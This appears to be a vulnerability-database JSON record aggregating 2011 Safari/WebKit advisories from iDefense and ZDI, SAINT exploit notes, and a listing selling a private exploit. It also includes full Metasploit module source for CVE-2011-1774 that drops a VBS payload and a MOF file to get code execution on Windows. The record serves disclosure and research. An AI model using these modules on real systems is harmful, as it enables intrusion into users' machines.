engine. It is currently used by\r\nApple Inc.'s Safari browser, as well as by Google's Chrome browser. For\r\nmore information, see the vendor's site at the following link.\r\n\r\nhttp://webkit.org/\r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of a heap based buffer overflow vulnerability in\r\nWebKit, as included with Apple Inc.'s Safari Web browser, could allow an\r\nattacker to execute arbitrary code with the privileges of the current\r\nuser.\r\n\r\nThe vulnerability occurs when parsing a frameset element with a\r\nmalicious style attribute. Specifically, by setting the padding property\r\nto certain values it is possible to trigger a heap based memory\r\ncorruption vulnerability. This can lead to the execution of arbitrary\r\ncode.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability results in the execution of arbitrary\r\ncode with the privileges of the user viewing the web page. To exploit\r\nthis vulnerability, a targeted user must load a malicious webpage\r\ncreated by an attacker. An attacker typically accomplishes this via\r\nsocial engineering or injecting content into compromised, trusted sites.\r\nAfter the user visits the malicious web page, no further user\r\ninteraction is needed.\r\n\r\nIV. DETECTION\r\n\r\nSafari versions prior to 5.1 and 5.0.6 are vulnerable.\r\n\r\nV. WORKAROUND\r\n\r\niDefense is currently unaware of an effective workaround for this\r\nvulnerability as it occurs in the core parsing code. However, disabling\r\nscripting will make the vulnerability more difficult to exploit using\r\nknown techniques.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nApple Inc. has released patches which addresses this issue. For more\r\ninformation, consult their advisory at the following URL:\r\n\r\nhttp://support.apple.com/kb/HT4808\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2011-0223 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n02/25/2011 Initial Vendor Notification\r\n02/25/2011 Initial Vendor Reply\r\n07/20/2011 Coordinated Public Disclosure\r\n\r\nIX. CREDIT\r\n\r\nThis vulnerability was reported to iDefense by Jose A. Vazquez of\r\n{http://spa-s3c.blogspot.com}.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright A\u00a9 2011 Verisign\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\ne-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n\r\n\r\n", "modified": "2011-07-22T00:00:00", "published": "2011-07-22T00:00:00", "id": "SECURITYVULNS:DOC:26669", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26669", "title": "iDefense Security Advisory 07.20.11: Multiple Vendor WebKit frameset style Heap Corruption Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "description": "ZDI-11-243: WebKit ContentEditable Inline Style Remote Code Execution Vulnerability\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-243\r\n\r\nJuly 27, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-0232\r\n\r\n-- CVSS:\r\n9, (AV:N/AC:L/Au:N/C:C/I:P/A:P)\r\n\r\n-- Affected Vendors:\r\nWebKit\r\n\r\n-- Affected Products:\r\nWebKit \r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 11099. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Webkit as utilized by either Apple Safari,\r\nor Google's Chrome browser. User interaction is required to exploit this\r\nvulnerability in that the target must visit a malicious page or open a\r\nmalicious file.\r\n\r\nThe specific flaw exists within how the library handles implicitly\r\ndefined styles. When processing a specific case for a style, the\r\napplication will dispatch an event. During this dispatch, code can be\r\nexecuted that can be used to manipulate the DOM tree causing a\r\ntype-switch. This type-switch can lead to code execution under the\r\ncontext of the application.\r\n\r\n-- Vendor Response:\r\nWebKit has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\nhttp://support.apple.com/kb/HT4808\r\n\r\n-- Disclosure Timeline:\r\n2011-03-31 - Vulnerability reported to vendor\r\n2011-07-27 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * J23 -- http://twitter.com/HansJ23\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "modified": "2011-08-01T00:00:00", "published": "2011-08-01T00:00:00", "id": "SECURITYVULNS:DOC:26759", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26759", "title": "ZDI-11-243: WebKit ContentEditable Inline Style Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:41", "bulletinFamily": "software", "description": "ZDI-11-241: Webkit setAttributes attributeChanged Remote Code Execution Vulnerability\r\n\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-11-241\r\n\r\nJuly 27, 2011\r\n\r\n-- CVE ID:\r\nCVE-2011-0254\r\n\r\n-- CVSS:\r\n7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P)\r\n\r\n-- Affected Vendors:\r\nWebKit\r\n\r\n-- Affected Products:\r\nWebKit \r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 11481. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of the Webkit Library. User interaction is\r\nrequired to exploit this vulnerability in that the target must visit a\r\nmalicious page or open a malicious file.\r\n\r\nThe specific flaw exists within the NamedNodeMap::setAttributes method\r\ndefined within the NamedNodeMap.cpp file distributed with WebKit. The\r\ncode responsible for copying attributes between DOM nodes does not\r\nverify that a mutation may have occurred when an attribute's\r\nattributeChanged method is called. By crafting a page that deletes\r\ninstances of that attribute when the above mentioned method is called\r\nthe code within setAttributes can be made to operate on freed objects.\r\nAn attacker can take advantage of this by spraying the heap in a way\r\nthat will not result in null pointers being referenced. This can lead to\r\narbitrary code execution under the context of the user running the\r\nbrowser.\r\n\r\n-- Vendor Response:\r\nWebKit has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\nhttp://support.apple.com/kb/HT4808\r\n\r\n-- Disclosure Timeline:\r\n2011-04-19 - Vulnerability reported to vendor\r\n2011-07-27 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "modified": "2011-08-01T00:00:00", "published": "2011-08-01T00:00:00", "id": "SECURITYVULNS:DOC:26757", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26757", "title": "ZDI-11-241: Webkit setAttributes attributeChanged Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-01T03:05:17", "bulletinFamily": "exploit", "description": "Remote command execution exploit works on Windows XP/Vista/7 and MacOSX Snow Leopard.\n\nThis is private exploit. You can buy it at https://0day.today", "modified": "2014-09-17T00:00:00", "published": "2014-09-17T00:00:00", "id": "1337DAY-ID-22651", "href": "https://0day.today/exploit/description/22651", "type": "zdt", "title": "Safari SVGPathSegList Use-After-Free Exploit", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "zdi": [{"lastseen": "2016-11-09T00:17:50", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari's Webkit. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the library's support of SVG markers. When updating a marker, the application will duplicate the reference of an object without updating it's reference count. When freeing this object, a use-after-free vulnerability can be made to occur. This can be leveraged by a remote attacker to execute code under the context of the user running the application.", "modified": "2011-11-09T00:00:00", "published": "2011-07-27T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-240", "id": "ZDI-11-240", "title": "Apple Safari Webkit SVG Marker Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:05", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari WebKit. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within how the application manages a reference to an anonymous block located near a particular element within the document. When cloning this element, the application will duplicate a reference to the block and then later re-attach this element to the rendering tree. During this process the library will free the original rendering element. Subsequent access to the same element will then cause the library to use the freed object. This can be utilized to achieve code execution under the context of the application.", "modified": "2011-11-09T00:00:00", "published": "2011-04-19T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-140", "id": "ZDI-11-140", "title": "Webkit Detached Body Element Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:59", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari Webkit. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the library's implementation of a FrameOwner element. When building this tree, the application will create a duplicate reference of an element. By freeing the referenced element, a use-after-free condition can be made to occur which can lead to code execution under the context of the application.", "modified": "2011-11-09T00:00:00", "published": "2011-07-27T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-239", "id": "ZDI-11-239", "title": "Apple Safari Webkit FrameOwner Element Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:57", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari Webkit. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the application's implementation of a Frame element. When attaching this element to a document, the application will duplicate a reference of an anonymous block. When freeing the container holding the Frame element, the reference will still be available. If an attacker can perform an explicit type change of the contents the element this can then be leveraged to gain code execution under the context of the application.", "modified": "2011-11-09T00:00:00", "published": "2011-04-19T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-138", "id": "ZDI-11-138", "title": "Webkit Undefined DOM Prototype Attach Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:11", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Webkit Library. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the NamedNodeMap::setAttributes method defined within the NamedNodeMap.cpp file distributed with WebKit. The code responsible for copying attributes between DOM nodes does not verify that a mutation may have occurred when an attribute's attributeChanged method is called. By crafting a page that deletes instances of that attribute when the above mentioned method is called the code within setAttributes can be made to operate on freed objects. An attacker can take advantage of this by spraying the heap in a way that will not result in null pointers being referenced. This can lead to arbitrary code execution under the context of the user running the browser.", "modified": "2011-11-09T00:00:00", "published": "2011-07-27T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-241", "id": "ZDI-11-241", "title": "Webkit setAttributes attributeChanged Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:08", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Safari's Webkit. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within how the application frees references from a particular element. When freeing these references, the application will fail to remove the reference from the rendering object. Later upon trying to free the element again, the application will access the freed reference which can lead to code execution under the context of the application.", "modified": "2011-11-09T00:00:00", "published": "2011-07-27T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-242", "id": "ZDI-11-242", "title": "Apple Safari Rendering Object Body Detachment Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:47", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Webkit as utilized by either Apple Safari, or Google's Chrome browser. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within how the library handles implicitly defined styles. When processing a specific case for a style, the application will dispatch an event. During this dispatch, code can be executed that can be used to manipulate the DOM tree causing a type-switch. This type-switch can lead to code execution under the context of the application.", "modified": "2011-11-09T00:00:00", "published": "2011-07-27T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-243", "id": "ZDI-11-243", "title": "WebKit ContentEditable Inline Style Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2019-06-04T23:19:34", "bulletinFamily": "exploit", "description": "Added: 10/24/2011 \nCVE: [CVE-2011-1774](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1774>) \nBID: [48840](<http://www.securityfocus.com/bid/48840>) \nOSVDB: [74017](<http://www.osvdb.org/74017>) \n\n\n### Background\n\n[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows. \n\n### Problem\n\nSafari versions prior to 5.0.6 use unsafe security settings when implementing libxslt. An attacker may leverage this weakness by creating a web page that references a malicious XSLT file. If loaded in a vulnerable Safari client, the attacker may be able to cause the browser to download, save and execute any file of their choice. \n\n### Resolution\n\nUpgrade to Apple Safari 5.0.6 or later. \n\n### References\n\n<http://support.apple.com/kb/HT4808> \n\n\n### Limitations\n\nThis exploit has been tested against Apple Safari 5.0.5 on Windows XP SP3 English (DEP OptIn). \nThe payload will not be executed until the next successful login. \nThe target must be able to connect to an HTTP server running on the SAINT Exploit host. This service listens on port 8000 by default. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-10-24T00:00:00", "published": "2011-10-24T00:00:00", "id": "SAINT:93F870242C8D8DFE6FB0218061E2532F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/safari_webkit_libxslt_file_create", "title": "Apple Safari libxslt File Create", "type": "saint", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:56", "bulletinFamily": "exploit", "description": "Added: 10/24/2011 \nCVE: [CVE-2011-1774](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1774>) \nBID: [48840](<http://www.securityfocus.com/bid/48840>) \nOSVDB: [74017](<http://www.osvdb.org/74017>) \n\n\n### Background\n\n[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows. \n\n### Problem\n\nSafari versions prior to 5.0.6 use unsafe security settings when implementing libxslt. An attacker may leverage this weakness by creating a web page that references a malicious XSLT file. If loaded in a vulnerable Safari client, the attacker may be able to cause the browser to download, save and execute any file of their choice. \n\n### Resolution\n\nUpgrade to Apple Safari 5.0.6 or later. \n\n### References\n\n<http://support.apple.com/kb/HT4808> \n\n\n### Limitations\n\nThis exploit has been tested against Apple Safari 5.0.5 on Windows XP SP3 English (DEP OptIn). \nThe payload will not be executed until the next successful login. \nThe target must be able to connect to an HTTP server running on the SAINT Exploit host. This service listens on port 8000 by default. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-10-24T00:00:00", "published": "2011-10-24T00:00:00", "id": "SAINT:E8E10FFE061EB44A3ED40AD04B13EC24", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/safari_webkit_libxslt_file_create", "type": "saint", "title": "Apple Safari libxslt File Create", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:57", "bulletinFamily": "exploit", "description": "Added: 10/24/2011 \nCVE: [CVE-2011-1774](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1774>) \nBID: [48840](<http://www.securityfocus.com/bid/48840>) \nOSVDB: [74017](<http://www.osvdb.org/74017>) \n\n\n### Background\n\n[Safari](<http://www.apple.com/safari/>) is a web browser for Mac OS X and Windows. \n\n### Problem\n\nSafari versions prior to 5.0.6 use unsafe security settings when implementing libxslt. An attacker may leverage this weakness by creating a web page that references a malicious XSLT file. If loaded in a vulnerable Safari client, the attacker may be able to cause the browser to download, save and execute any file of their choice. \n\n### Resolution\n\nUpgrade to Apple Safari 5.0.6 or later. \n\n### References\n\n<http://support.apple.com/kb/HT4808> \n\n\n### Limitations\n\nThis exploit has been tested against Apple Safari 5.0.5 on Windows XP SP3 English (DEP OptIn). \nThe payload will not be executed until the next successful login. \nThe target must be able to connect to an HTTP server running on the SAINT Exploit host. This service listens on port 8000 by default. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-10-24T00:00:00", "published": "2011-10-24T00:00:00", "id": "SAINT:92788531D3EC95DEA25C0A30FCD1E592", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/safari_webkit_libxslt_file_create", "type": "saint", "title": "Apple Safari libxslt File Create", "cvss": {"score": 8.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2019-10-16T10:23:55", "bulletinFamily": "exploit", "description": "This module exploits a XSLT vulnerability in Webkit to drop ASCII or UTF-8 files to the target file-system. By default, the file will be dropped in C:\\Program Files\\\n", "modified": "2018-07-12T22:34:52", "published": "2011-10-18T16:30:28", "id": "MSF:AUXILIARY/SERVER/WEBKIT_XSLT_DROPPER", "href": "", "type": "metasploit", "title": "Cross Platform Webkit File Dropper", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Cross Platform Webkit File Dropper',\n 'Description' => %q{\n This module exploits a XSLT vulnerability in Webkit to drop ASCII or UTF-8\n files to the target file-system. By default, the file will be dropped in\n C:\\Program Files\\\n },\n 'Author' => [ 'Nicolas Gregoire' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2011-1774' ]\n ],\n 'Actions' =>\n [\n [ 'WebServer' ]\n ],\n 'PassiveActions' =>\n [\n 'WebServer'\n ],\n 'DefaultAction' => 'WebServer'))\n\n register_options(\n [\n OptString.new('REMOTE_PATH', [ true, \"Location of the remote file\", 'flag.txt' ]),\n OptString.new('REMOTE_CONTENT', [ true, \"Content of the remote file\", 'Hello from CVE-2011-1774' ])\n ])\n end\n\n def on_request_uri(cli, request)\n path = datastore['REMOTE_PATH']\n content = datastore['REMOTE_CONTENT']\n html = <<-EOS\n<?xml-stylesheet type=\"text/xml\" href=\"#fragment\"?>\n\n<!DOCTYPE doc [\n <!ATTLIST xsl:stylesheet\n id ID #REQUIRED\n>]>\n<doc>\n\n\n<path><![CDATA[#{path}]]></path>\n<content><![CDATA[#{content}]]></content>\n\n\n<xsl:stylesheet id=\"fragment\" version=\"1.0\"\n xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\n xmlns:sx=\"http://icl.com/saxon\"\n extension-element-prefixes=\"sx\"\n xmlns=\"http://www.w3.org/1999/xhtml\" >\n<xsl:output method=\"xml\" indent=\"yes\" />\n\n\n<xsl:template match=\"/\">\n \n <xsl:variable name=\"path\" select=\"//path/text()\"/>\n <sx:output file=\"{$path}\" method=\"text\">\n <xsl:value-of select=\"//content\"/>\n </sx:output>\n \n <html> </html>\n</xsl:template>\n</xsl:stylesheet>\n</doc>\nEOS\n\n print_status(\"Sending XSLT payload ...\")\n print_status(\"Destination file : #{path}\")\n send_response_html(cli, html, { 'Content-Type' => 'application/xml' })\n end\n\n def run\n exploit()\n end\nend\n", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/webkit_xslt_dropper.rb"}, {"lastseen": "2019-11-05T17:45:56", "bulletinFamily": "exploit", "description": "This module exploits a file creation vulnerability in the Webkit rendering engine. It is possible to redirect the output of a XSLT transformation to an arbitrary file. The content of the created file must be ASCII or UTF-8. The destination path can be relative or absolute. This module has been tested on Safari and Maxthon. Code execution can be achieved by first uploading the payload to the remote machine in VBS format, and then upload a MOF file, which enables Windows Management Instrumentation service to execute the VBS.\n", "modified": "2017-09-14T02:03:34", "published": "2011-10-18T07:39:50", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/SAFARI_XSLT_OUTPUT", "href": "", "type": "metasploit", "title": "Apple Safari Webkit libxslt Arbitrary File Creation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::EXE\n include Msf::Exploit::WbemExec\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apple Safari Webkit libxslt Arbitrary File Creation',\n 'Description' => %q{\n This module exploits a file creation vulnerability in the Webkit\n rendering engine. It is possible to redirect the output of a XSLT\n transformation to an arbitrary file. The content of the created file must be\n ASCII or UTF-8. The destination path can be relative or absolute. This module\n has been tested on Safari and Maxthon. Code execution can be achieved by first\n uploading the payload to the remote machine in VBS format, and then upload a MOF\n file, which enables Windows Management Instrumentation service to execute the VBS.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Nicolas Gregoire'],\n 'References' =>\n [\n ['CVE', '2011-1774'],\n ['OSVDB', '74017'],\n ['URL', 'http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html'],\n ],\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n },\n 'Payload' =>\n {\n 'Space' => 2048,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n #Windows before Vista\n [ 'Automatic', { } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jul 20 2011'))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Check target before attacking\n agent = request.headers['User-Agent']\n if agent !~ /Windows NT 5\\.1/ or agent !~ /Safari\\/5/ or agent =~ /Chrome/\n print_error(\"This target isn't supported: #{agent.to_s}\")\n send_not_found(cli)\n return\n end\n\n url = \"http://\"\n url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\n url += \":\" + datastore['SRVPORT'].to_s + get_resource() + \"/\"\n\n content = <<-EOS\n<?xml-stylesheet type=\"text/xml\" href=\"#fragment\"?>\n\n<!DOCTYPE doc [\n <!ATTLIST xsl:stylesheet\n id ID #REQUIRED\n>]>\n<doc>\n\n\n<mof>\n <location><![CDATA[\\\\\\\\.\\\\GLOBALROOT\\\\SystemRoot\\\\system32\\\\wbem\\\\mof\\\\#{@mof_name}]]></location>\n <content><![CDATA[#{@mof_content}]]></content>\n</mof><vbs>\n <location><![CDATA[\\\\\\\\.\\\\GLOBALROOT\\\\SystemRoot\\\\system32\\\\#{@vbs_name}]]></location>\n <content><![CDATA[#{@vbs_content}]]></content>\n</vbs>\n\n\n<xsl:stylesheet id=\"fragment\" version=\"1.0\"\n xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\n xmlns:sx=\"http://icl.com/saxon\"\n extension-element-prefixes=\"sx\"\n xmlns=\"http://www.w3.org/1999/xhtml\" >\n<xsl:output method=\"xml\" indent=\"yes\" />\n\n\n<xsl:template match=\"/\">\n \n <xsl:variable name=\"moflocation\" select=\"//mof/location/text()\"/>\n <xsl:variable name=\"vbslocation\" select=\"//vbs/location/text()\"/>\n \n <sx:output file=\"{$vbslocation}\" method=\"text\">\n <xsl:value-of select=\"//vbs/content\"/>\n </sx:output>\n <sx:output file=\"{$moflocation}\" method=\"text\">\n <xsl:value-of select=\"//mof/content\"/>\n </sx:output>\n \n <html> </html>\n</xsl:template>\n</xsl:stylesheet>\n</doc>\n EOS\n\n #Clear the extra tabs\n content = content.gsub(/^ {4}/, '')\n\n print_status(\"Sending #{self.name}\")\n send_response(cli, content, {'Content-Type'=>'application/xml'})\n handler(cli)\n\n end\n\n def exploit\n # In order to save binary data to the file system the payload is written to a VBS\n # file and execute it from there via a MOF\n @mof_name = rand_text_alpha(rand(5)+5) + \".mof\"\n @vbs_name = rand_text_alpha(rand(5)+5) + \".vbs\"\n\n print_status(\"Encoding payload into vbs...\")\n payload = generate_payload_exe\n @vbs_content = Msf::Util::EXE.to_exe_vbs(payload)\n\n print_status(\"Generating mof file...\")\n @mof_content = generate_mof(@mof_name, @vbs_name)\n super\n end\nend\n", "cvss": {"score": 8.8, "vector": "AV:N/AC:M/Au:N/C:N/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/safari_xslt_output.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:25:22", "bulletinFamily": "exploit", "description": "", "modified": "2011-10-18T00:00:00", "published": "2011-10-18T00:00:00", "href": "https://packetstormsecurity.com/files/105943/Apple-Safari-Webkit-libxslt-Arbitrary-File-Creation.html", "id": "PACKETSTORM:105943", "type": "packetstorm", "title": "Apple Safari Webkit libxslt Arbitrary File Creation", "sourceData": "`## \n# $Id: safari_xslt_output.rb 13987 2011-10-18 07:39:50Z sinn3r $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::EXE \ninclude 